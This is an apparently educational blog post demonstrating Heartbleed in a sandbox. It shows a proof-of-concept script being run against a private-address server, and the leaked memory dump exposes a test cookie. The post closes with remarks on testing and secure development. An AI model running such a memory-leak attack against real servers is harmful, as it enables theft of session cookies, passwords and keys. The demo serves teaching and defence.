Heartbleed: Viewing Session Data

A major problem within the Heartbleed vulnerabilty is that an intruder can see the running memory of the Web server. As this memory often contains running data, such as session variables, passwords, encryption keys, and so on, it can reveal sensitive user information. In this sandboxed demo, we can see that the cookie information from the client can be seen within the running memory of the server:

From this we can see that the captured memory is:

billbuchanan@bills-mbp:~$ python heartbleed-poc.py  172.16.121.150
Scanning 172.16.121.150 on port 443
Connecting...
Sending Client Hello...
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 937
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Server TLS version was 1.2

Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2E 38 0D 0A  ....#........8..
  00e0: 41 63 63 65 70 74 2D 4C 61 6E 67 75 61 67 65 3A  Accept-Language:
  00f0: 20 65 6E 2D 67 62 2C 65 6E 3B 71 3D 30 2E 35 0D   en-gb,en;q=0.5.
  0100: 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64 69 6E 67  .Accept-Encoding
  0110: 3A 20 67 7A 69 70 2C 20 64 65 66 6C 61 74 65 0D  : gzip, deflate.
  0120: 0A 43 6F 6F 6B 69 65 3A 20 74 65 73 74 63 6F 6F  .Cookie: testcoo
  0130: 6B 69 65 3D 68 65 6C 6C 6F 2B 62 69 6C 6C 0D 0A  kie=hello+bill..
  0140: 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 6B 65 65 70  Connection: keep
  0150: 2D 61 6C 69 76 65 0D 0A 0D 0A 5C A1 0F 0A E2 D8  -alive....\.....
  0160: 66 30 62 A9 FC 99 A3 B7 A0 C4 00 00 00 00 00 00  f0b.............

Often a cookie is used to hold things like session ID and/or login credentials, thus an intruder can steal these, and log into the system.

How can we protect against this?

Well, it’s actually quite difficult. The reason this has happened is that openssl is seen as a highly trusted program, so that it is allowed to actually read from sensistive areas of memory. This memory contains the program’s data such as for it running variables, and can thus contains usernames, passwords, encryption keys, and so on. Thus if we trust the program so highly there is often very few checks that the operating system will make on how it operates. Other programs, such as for Microsoft .NET and Java, run within a completely sandboxed environment, and thus there are checks on what they can access – and which is known as managed code. Unfortunately a highly trusted component, especially one written in a low-level language such as C++, can gain access to sensitive areas that many other programs would not have the rights too. Thus the solution is really on the software development side, and it highlights the need to continually check programs for their operation, not only for normal data, but with extremely data input. Unfortunately many software developers do not spend enough time testing, and often they test their own code. So we need a whole new generation of people, who know how to write code, and also how to test it. These people are not likely to actually write the code, but they are the people who will understand it, and know how to review and test it.

 

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s